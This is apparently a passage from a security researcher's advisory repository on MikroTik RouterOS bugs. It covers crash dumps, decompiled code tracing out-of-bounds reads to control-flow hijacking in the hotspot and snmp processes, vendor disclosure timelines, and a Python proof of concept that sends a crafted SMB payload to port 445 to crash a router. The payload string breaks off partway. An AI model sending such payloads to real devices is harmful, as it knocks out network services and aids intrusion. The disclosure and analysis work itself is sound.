00000000 00:12 34 /ram/pckg/hotspot/nova/bin/hotspot 55 | 2020.06.22-15:04:20.55@0: 7770d000-77742000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 56 | 2020.06.22-15:04:20.55@0: 77746000-77760000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 57 | 2020.06.22-15:04:20.55@0: 77761000-77770000 r-xp 00000000 00:0c 944 /lib/libuc++.so 58 | 2020.06.22-15:04:20.55@0: 77771000-7778e000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 59 | 2020.06.22-15:04:20.55@0: 7778f000-77795000 r-xp 00000000 00:0c 951 /lib/liburadius.so 60 | 2020.06.22-15:04:20.55@0: 77796000-777e2000 r-xp 00000000 00:0c 946 /lib/libumsg.so 61 | 2020.06.22-15:04:20.55@0: 777e5000-777ed000 r-xp 00000000 00:0c 950 /lib/libubox.so 62 | 2020.06.22-15:04:20.55@0: 
777f1000-777f8000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 63 | 2020.06.22-15:04:20.55@0: 64 | 2020.06.22-15:04:20.55@0: stack: 0x7fad2000 - 0x7fad0f5c 65 | 2020.06.22-15:04:20.55@0: 91 f9 05 08 8a e0 7a 6d 9c 0f ad 7f b4 0f ad 7f 00 00 00 00 9c 0f ad 7f 01 00 00 00 03 00 00 00 66 | 2020.06.22-15:04:20.55@0: 00 4f 74 77 9c 0f ad 7f ff ff ff ff 1c e0 07 08 18 e0 07 08 b0 fb 07 08 00 00 00 00 c8 0f ad 7f 67 | 2020.06.22-15:04:20.55@0: 68 | 2020.06.22-15:04:20.55@0: code: 0x65737520 69 | ``` 70 | 71 | #### Details 72 | 73 | It can be triggered by sending a nova message to the default handler. In its vtable, the default `nv::Handler::cmdUnknown()` is overridden by `sub_805F834()`. 74 | 75 | In `sub_805F834()`, if `a5` equals `0xfe0008`, the routine reaches `(2)`, where the value of u32_id `0xfe000e` is read and assigned to `v51`. In the for loop at `(3)`, `v51` becomes the starting value of `i`, and the loop condition uses a signed comparison. Later at `(4)`, `i` is used as an index to read from address `0x80779E0`, and the value read is assigned to `v12` at `(5)`. Then at `(6)`, `v12` is called as a function pointer. 76 | The key point is the signed comparison at `(3)`. If a negative value like `-1` is provided, the check `i <= 11` still passes, causing an out-of-bounds read at `(4)` that in turn affects the function pointer at `(6)`. By sending a crafted nova message, it's possible to achieve code execution. 77 | 78 | ```c++ 79 | // file: /ram/pckg/hotspot/nova/bin/hotspot in stable 6.46.5 80 | nv::Handler sub_805F834(int a1, nv::Handler *a2, nv::message *a3, unsigned int a4, int a5) 81 | { 82 | if ( a5 != 0xFE0008 ) // (1) command id 83 | { 84 | /* ... case for other command ids ... */ 85 | } 86 | v55 = (nv::message **)dword_8078804; 87 | v5 = nv::message::get(a4, 0xFE000F, a1, a1); 88 | nv::message::message(v58, v5); 89 | v51 = nv::message::get(a4, 0xFE000E); // (2) 90 | /* ... */ 91 | if ( v51 ) 92 | { 93 | /* ... 
*/ 94 | for ( i = v51; i <= 11; ++i ) // (3) signed comparison 95 | { 96 | if ( dword_80779E0[5 * i] ) 97 | { 98 | string::string((string *)v64); 99 | v11 = dword_80779E0[5 * i]; // (4) out-of-bounds read 100 | v12 = (int (__cdecl *)(char *, char *, char *, bool))v11; // (5) 101 | v13 = dword_80779E4[5 * i]; 102 | if ( (v11 & 1) != 0 ) 103 | v12 = *(int (__cdecl **)(char *, char *, char *, bool))(*(char **)((char *)v55 + v13) + v11 - 1); 104 | v14 = v12((char *)v55 + v13, v58, v64, i != v51); // (6) control flow hijacking 105 | /* ... */ 106 | ``` 107 | 108 | #### Affected Version 109 | 110 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `7.5`. 111 | 112 | #### Timeline 113 | 114 | + 2022/07/29 - reported the vulnerability to the vendor 115 | + 2022/08/16 - the vendor confirmed the vulnerability and said it would be fixed in future releases 116 | + 2022/08/26 - the vendor confirmed that the vulnerability was fixed 117 | + 2022/08/31 - stable `7.5` was released with the fix 118 | + 2022/12/06 - CVE was assigned 119 | -------------------------------------------------------------------------------- /advisory/MikroTik/CVE-2022-45315/README.md: -------------------------------------------------------------------------------- 1 | ### CVE-2022-45315 2 | 3 | #### Description 4 | 5 | The `snmp` process suffers from an out-of-bounds read vulnerability. Due to a lack of proper validation of the value of a specific u32_id key, by sending a crafted packet it's possible to cause an out-of-bounds read, which may later affect the function pointer of an indirect call. This makes it possible for an authenticated user to achieve code execution. 6 | 7 | > The authentication here means that the user should be authenticated to the device itself (e.g. web, winbox). 8 | 9 | Against stable `6.47`, the poc resulted in the following crash dump. 
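The signed index check at `(3)` in the CVE-2022-45313 `hotspot` handler above, reduced to a small C model with the hardened form beside it. This is an added example, not code from the advisory or from RouterOS: the table, its two callbacks and the function names are constructed stand-ins for `dword_80779E0` and its five-dword entries.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed model of the 12-entry table at 0x80779E0 in the decompiled
 * routine: each entry is five dwords, the first being the callback pointer.
 * The callbacks below are stand-ins, not RouterOS code. */
#define TABLE_ENTRIES 12

typedef int (*entry_fn)(int);

struct entry {
    entry_fn fn;          /* dword_80779E0[5 * i] in the decompilation */
    uint32_t other[4];    /* the remaining four dwords of the entry (unused here) */
};

static int add_one(int x)   { return x + 1; }
static int times_two(int x) { return x * 2; }

/* Only slots 0 and 1 are populated; the rest hold a null fn, which is the
 * case the original's `if ( dword_80779E0[5 * i] )` test anticipates. */
static struct entry table[TABLE_ENTRIES] = {
    { add_one, {0} },
    { times_two, {0} },
};

/* The condition at (3) as decompiled: `i` is signed and only the upper bound
 * is checked, so every negative start value is accepted and would index
 * memory before the table. */
bool original_index_check(int32_t i)
{
    return i <= 11;
}

/* Hardened form: compare as unsigned, which rejects both negative values
 * (they wrap to huge numbers) and values >= 12 with a single test. */
bool fixed_index_check(int32_t i)
{
    return (uint32_t)i < TABLE_ENTRIES;
}

/* Hardened version of the loop at (3)-(6). The start index comes from an
 * attacker-controlled u32_id value, so it is validated before it is used as
 * a table index. Returns the chained result, or -1 if the index is rejected;
 * *calls receives the number of callbacks actually invoked. */
int dispatch_from(int32_t start, int arg, int *calls)
{
    *calls = 0;
    if (!fixed_index_check(start))
        return -1;
    int result = arg;
    for (int32_t i = start; i < TABLE_ENTRIES; ++i) {
        entry_fn fn = table[i].fn;
        if (fn != NULL) {
            result = fn(result);
            ++*calls;
        }
    }
    return result;
}

int main(void)
{
    int calls;
    int32_t probes[] = { 0, 1, 11, 12, -1, INT32_MIN };
    for (size_t k = 0; k < sizeof probes / sizeof probes[0]; ++k) {
        int32_t i = probes[k];
        printf("index %11d: original check %s, fixed check %s, dispatch -> %d\n",
               (int)i,
               original_index_check(i) ? "accepts" : "rejects",
               fixed_index_check(i) ? "accepts" : "rejects",
               dispatch_from(i, 3, &calls));
    }
    return 0;
}
```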
10 | 11 | ```shell 12 | ---- current v6.47 Jun/02/2020 07:38:00 ---- 13 | 2022.10.12-16:41:40.81@0: 14 | 2022.10.12-16:41:40.81@0: /nova/bin/snmp 15 | 2022.10.12-16:41:40.81@0: --- signal=11 -------------------------------------------- 16 | 2022.10.12-16:41:40.81@0: 17 | // ... register details are missing in the generated autosupout.rif 18 | 2022.10.12-16:41:40.81@0: 19 | 2022.10.12-16:41:40.81@0: 776ad000-776b3000 r-xp 00000000 00:19 92 /ram/pckg/wireless/nova/lib/snmp/wireless.so 20 | 2022.10.12-16:41:40.81@0: 776b4000-776b7000 r-xp 00000000 00:12 16 /ram/pckg/ups/nova/lib/snmp/ups.so 21 | 2022.10.12-16:41:40.81@0: 776b8000-776ba000 r-xp 00000000 00:13 95 /ram/pckg/ppp/nova/lib/snmp/aaasession.so 22 | ... 23 | 2022.10.12-16:41:40.81@0: 776c4000-776c7000 r-xp 00000000 00:11 83 /ram/pckg/ipv6/nova/lib/snmp/ipv6.so 24 | 2022.10.12-16:41:40.81@0: 776c9000-776fe000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so 25 | 2022.10.12-16:41:40.81@0: 77702000-7771c000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1 26 | 2022.10.12-16:41:40.81@0: 7771d000-7772c000 r-xp 00000000 00:0c 945 /lib/libuc++.so 27 | 2022.10.12-16:41:40.81@0: 7772d000-7774a000 r-xp 00000000 00:0c 948 /lib/libucrypto.so 28 | 2022.10.12-16:41:40.81@0: 7774b000-7774d000 r-xp 00000000 00:0c 961 /lib/libdl-0.9.33.2.so 29 | 2022.10.12-16:41:40.81@0: 7774f000-77757000 r-xp 00000000 00:0c 951 /lib/libubox.so 30 | 2022.10.12-16:41:40.81@0: 77758000-777a4000 r-xp 00000000 00:0c 947 /lib/libumsg.so 31 | 2022.10.12-16:41:40.81@0: 777aa000-777b1000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so 32 | 2022.10.12-16:41:40.81@0: 33 | 2022.10.12-16:41:40.81@0: backtrace: 0x00000001 0x77725a21 0x08071054 0x0806e019 0x7775396a 0x7777fff9 0x7777caca 0x7777f092 0x7777ee4e 0x7777a85b 0x7777a2a5 0x7777a3bf 0x7778103f 0x08056bb5 0x776f7fcb 0x08056c0d 34 | ``` 35 | 36 | #### Details 37 | 38 | According to the backtrace information, in `Item::setConfig()`, at `(1)`, it will read value of u32_id `20`, and save it to the memory 
pointed by `this + 6`. Then in normal cases, the routine will reach `(2)`, where `Item::regenerateKeys()` is called. 39 | 40 | ```c++ 41 | // file: /nova/bin/snmp in stable 6.47 42 | int Item::setConfig(Item *this, const nv::message *a2) 43 | { 44 | /* ... */ 45 | *((_DWORD *)this + 6) = nv::message::get(a2, 20, *((_DWORD *)this + 6)); // (1) 46 | *((_DWORD *)this + 7) = nv::message::get(a2, 21, *((_DWORD *)this + 7)); 47 | /* ... */ 48 | if ( loop ) 49 | Item::regenerateKeys(this, (SnmpLooper *)((char *)loop + 1460)); // (2) 50 | /* ... */ 51 | ``` 52 | 53 | In `Item::regenerateKeys()`, the previous saved value will be assigned to `v2` at `(3)`. At `(4)`, `v2` is used as an offset to calculate address, and the result is assigned to `v3`. Then it will perform multiple lookups, in some cases, the routine will reach `(6)`, where `tree_base::insert_unique()` is called, and `v3` is passed as the second argument. It should be noted that the `v3` is controllable. 54 | 55 | ```c++ 56 | int Item::regenerateKeys(Item *this, const string *a2) 57 | { 58 |   v2 = *((_DWORD *)this + 6); // (3) 59 |   v3 = 28 * v2 + 0x8074B84; // (4) out-of-bounds read 60 |   v4 = 28 * v2 + 0x8074B88; 61 |   v5 = *((_DWORD *)&unk_8074B88 + 7 * v2) & 0xFFFFFFFC; // (5) 62 |   v6 = v4; 63 |   /* ... search in tree related to v5 and change v6 ... */ 64 |   if ( v6 == v4 ) 65 |   { 66 |     v9 = *(_DWORD *)(v3 + 4) & 0xFFFFFFFC; 67 |     v10 = v6; 68 |     /* ... search in tree related to v9 and change v10 ...*/ 69 |     if ( v10 == v6 ) 70 |     { 71 |       /* ... */ 72 |       tree_base::insert_unique((int)&v18, v3, v10, (int)&v23, 73 | (int)map_node_constr>); // (6) 74 |       /* ...*/ 75 | } 76 | ``` 77 | 78 | In `tree_base::insert_unique()`, there are many calls to `sub_938c()`, where `a2` is passed as the first argument. 
79 | 80 | ```c++ 81 | _DWORD * tree_base::insert_unique(_DWORD *a1, _DWORD *a2, int a3, int a4, void (__cdecl *a5)(int)) 82 | { 83 |   if ( a3 == a2[2] ) 84 |   { 85 |     if ( !*a2 || !sub_938C((int)a2, a4, a2[5] + a3) ) 86 |       goto LABEL_12; 87 |     goto LABEL_10; 88 |   } 89 |   if ( (_DWORD *)a3 != a2 + 1 ) 90 |   { 91 |     v7[0] = a3; 92 |     tree_iterator_base::decr((tree_iterator_base *)v7); 93 |     if ( !sub_938C((int)a2, a2[5] + v7[0], a4) || !sub_938C((int)a2, a4, a2[5] + a3) ) 94 |       goto LABEL_12; 95 | LABEL_10: 96 |     a5(a4); 97 |     goto LABEL_11; 98 |   } 99 |   if ( !sub_938C((int)a2, a2[5] + a2[3], a4) ) //(7) 100 |   { 101 |     /* ... */ 102 | } 103 | ``` 104 | 105 | 106 | In `sub_938C()`, as can be seen, it will dereference the value at `(a1+16)`, and invoke a function call. Since `a1` is controllable, by sending a crafted nova message, we can hijack the control flow. 107 | 108 | ```c++ 109 | int sub_938C(int a1, int a2, int a3) 110 | { 111 |   return (*(int (__stdcall **)(_DWORD, int, int))(a1 + 16))( 112 | *(_DWORD *)(a1 + 24), a2, a3); //(8) control flow hijacking 113 | } 114 | ``` 115 | 116 | #### Affected Version 117 | 118 | This vulnerability was initially found in long-term `6.44.6`. And the stable `7.6` seems to still suffer from this vulnerability. 119 | 120 | > The vendor responded that it was fixed in `7.6` version. 121 | 122 | #### Timeline 123 | 124 | + 2022/07/29 - reported the vulnerability to the vendor 125 | + 2022/08/16 - vendor confirmed the vulnerability 126 | + 2022/10/31 - vendor responded that it was fixed in `7.6` version 127 | + 2022/12/05 - CVE was assigned 128 | 129 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_hotspot_2/README.md: -------------------------------------------------------------------------------- 1 | ### vul_hotspot_2 2 | 3 | #### Description 4 | 5 | The `hotspot` process suffers from an assertion failure vulnerability. 
There is a reachable assertion in the `hotspot` process. By sending a crafted packet, an authenticated remote user can crash the `hotspot` process due to assertion failure. 6 | 7 | > The authentication here means that the user should be authenticated to the device itself (e.g. web, winbox). 8 | 9 | Against stable `6.46.5`, the poc resulted in the following crash dump. 10 | 11 | ```shell 12 | ---- current v6.46.5 Apr/07/2020 08:28:27 ---- 13 | 2022.10.31-15:15:36.78@0: 14 | 2022.10.31-15:15:36.78@0: 15 | 2022.10.31-15:15:36.78@0: /ram/pckg/hotspot/nova/bin/hotspot 16 | 2022.10.31-15:15:36.78@0: --- signal=6 -------------------------------------------- 17 | 2022.10.31-15:15:36.78@0: 18 | 2022.10.31-15:15:36.78@0: eip=0x7767e55b eflags=0x00000246 19 | 2022.10.31-15:15:36.78@0: edi=0x00000fe1 esi=0x77686200 ebp=0x7fdf7120 esp=0x7fdf7118 20 | 2022.10.31-15:15:36.78@0: eax=0x00000000 ebx=0x000000b8 ecx=0x000000b8 edx=0x00000006 21 | 2022.10.31-15:15:36.78@0: 22 | 2022.10.31-15:15:36.78@0: maps: 23 | 2022.10.31-15:15:36.78@0: 08048000-08078000 r-xp 00000000 00:12 34 /ram/pckg/hotspot/nova/bin/hotspot 24 | 2022.10.31-15:15:36.78@0: 77650000-77685000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so 25 | 2022.10.31-15:15:36.78@0: 77689000-776a3000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1 26 | 2022.10.31-15:15:36.78@0: 776a4000-776b3000 r-xp 00000000 00:0c 944 /lib/libuc++.so 27 | 2022.10.31-15:15:36.78@0: 776b4000-776d1000 r-xp 00000000 00:0c 947 /lib/libucrypto.so 28 | 2022.10.31-15:15:36.78@0: 776d2000-776d8000 r-xp 00000000 00:0c 951 /lib/liburadius.so 29 | 2022.10.31-15:15:36.78@0: 776d9000-77725000 r-xp 00000000 00:0c 946 /lib/libumsg.so 30 | 2022.10.31-15:15:36.78@0: 77728000-77730000 r-xp 00000000 00:0c 950 /lib/libubox.so 31 | 2022.10.31-15:15:36.78@0: 77734000-7773b000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 32 | 2022.10.31-15:15:36.78@0: 33 | 2022.10.31-15:15:36.78@0: stack: 0x7fdf8000 - 0x7fdf7118 34 | 2022.10.31-15:15:36.78@0: 00 60 68 77 00 60 68 
77 58 71 df 7f 77 a0 67 77 06 00 00 00 00 62 68 77 20 00 00 00 00 00 00 00 35 | 2022.10.31-15:15:36.78@0: 15 00 00 00 b8 71 df 7f 54 71 df 7f e4 5a 72 77 01 00 00 00 e4 5a 72 77 15 00 00 00 e1 0f 00 00 36 | 2022.10.31-15:15:36.78@0: 37 | 2022.10.31-15:15:36.78@0: code: 0x7767e55b 38 | 2022.10.31-15:15:36.78@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 39 | 2022.10.31-15:15:36.78@0: 40 | 2022.10.31-15:15:36.78@0: backtrace: 0x7767e55b 0x7767a077 0x77704ad3 0x7772c9a5 0x77700fb5 0x776fda8a 0x7770004e 0x776ffe82 0x776fb81b 0x776fb265 0x776fb37f 0x77701ffb 0x0804f7ed 0x7767efcb 0x08050b01 41 | ``` 42 | 43 | #### Affected Version 44 | 45 | This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `7.5`. 46 | 47 | #### Timeline 48 | 49 | + 2022/07/29 - reported the vulnerability to the vendor 50 | + 2022/08/16 - vendor confirmed the vulnerability and would fix it in future releases 51 | + 2022/08/26 - vendor confirmed that the vulnerability was fixed 52 | + 2022/08/31 - stable 7.5 was released and this vulnerability was fixed 53 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_1/README.md: -------------------------------------------------------------------------------- 1 | ### vul_smb_1 2 | 3 | #### Description 4 | 5 | The `smb` process suffers from a memory corruption vulnerability. By sending a crafted packet, an unauthenticated remote user can crash the `smb` process due to invalid memory access. 6 | 7 | > In default, the `smb` service is disabled. 8 | 9 | #### Reproduce 10 | 11 | ```shell 12 | $ python poc.py 13 | ``` 14 | #### Affected Version 15 | 16 | This vulnerability was found in stable `6.44.2`, and was fixed since stable `6.44.3`. 
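The out-of-bounds reads in CVE-2022-45313 and CVE-2022-45315 above share one root cause: a u32 taken from a nova message is used as a table index with, at most, a signed upper-bound check. The C below is an added example, not RouterOS code; the table layout, the handler bodies and the record count of 12 (from the loop bound `i <= 11`) are constructed to mirror the decompiled shapes, with the vulnerable selection beside the hardened one.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

typedef int (*cmd_fn)(uint32_t arg);

/* dword_80779E0[5 * i]: one record is 5 dwords (20 bytes on the 32-bit
 * target): a function pointer, an object offset and three dwords we do
 * not model. */
struct cmd_record { cmd_fn fn; uint32_t obj_off; uint32_t pad[3]; };

#define CMD_RECORDS   12   /* `for (i = v51; i <= 11; ++i)` covers 12 records */
#define RECORD_BYTES  20   /* stride of the 32-bit table, independent of host ABI */

static int cmd_echo(uint32_t a)  { return (int)a; }
static int cmd_twice(uint32_t a) { return (int)(2 * a); }

/* Constructed table: two populated slots, the rest empty (NULL fn), which the
 * original loop skips with `if ( dword_80779E0[5 * i] )`. */
static const struct cmd_record cmd_table[CMD_RECORDS] = {
    [0] = { cmd_echo,  0, {0, 0, 0} },
    [1] = { cmd_twice, 4, {0, 0, 0} },
};

enum lookup { LOOKUP_OK, LOOKUP_REJECTED, LOOKUP_OOB_READ };

/* Vulnerable shape (CVE-2022-45313): the u32 from the message is held in an
 * int and only `i <= 11` is tested, so 0xffffffff becomes -1 and selects the
 * record 20 bytes before the table. We report that case instead of reading. */
enum lookup select_cmd_signed(uint32_t raw, int *result)
{
    int i = (int)raw;
    if (i > 11)
        return LOOKUP_REJECTED;      /* the only bound the original checks */
    if (i < 0)
        return LOOKUP_OOB_READ;      /* would read cmd_table[i].fn with i < 0 */
    if (cmd_table[i].fn == NULL)
        return LOOKUP_REJECTED;
    *result = cmd_table[i].fn(7);
    return LOOKUP_OK;
}

/* Hardened shape: compare the raw value unsigned against the record count, so
 * no sign change can turn a large id into a negative index. */
enum lookup select_cmd_checked(uint32_t raw, int *result)
{
    if (raw >= CMD_RECORDS || cmd_table[raw].fn == NULL)
        return LOOKUP_REJECTED;
    *result = cmd_table[raw].fn(7);
    return LOOKUP_OK;
}

/* Byte offset from the table base that the signed loop would read for `raw`:
 * 0xffffffff gives -20, i.e. the 20 bytes just before dword_80779E0. */
long signed_record_offset(uint32_t raw)
{
    return (long)(int)raw * RECORD_BYTES;
}

/* CVE-2022-45315 shape: Item::regenerateKeys() forms v3 = 28 * v2 + 0x8074B84
 * with no check at all. The hardened form bounds v2 by the number of 28-byte
 * key records before forming the address; returns the record's byte offset,
 * or -1 when v2 is out of range. */
long key_record_offset(uint32_t v2, uint32_t nrecords)
{
    if (v2 >= nrecords)
        return -1;
    return (long)v2 * 28;
}

int main(void)
{
    static const uint32_t ids[] = { 1, 11, 12, 0xffffffffu };
    for (size_t k = 0; k < sizeof ids / sizeof ids[0]; k++) {
        int r = 0;
        printf("id=0x%08x signed=%d checked=%d\n", (unsigned)ids[k],
               (int)select_cmd_signed(ids[k], &r), (int)select_cmd_checked(ids[k], &r));
    }
    return 0;
}
```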
17 | 18 | -------------------------------------------------------------------------------- /advisory/MikroTik/vul_smb_1/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | import socket 4 | 5 | 6 | def vul_smb_1(host, port=445): 7 | payload = '\x00\x00\x00\xee\xfeSMB\x0e\xf3\xa0\x80\xb6\xfe\xa0\x80\xbd\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0
e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xe
f\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0e\xfe\xef\xbf\xbf\xff\x0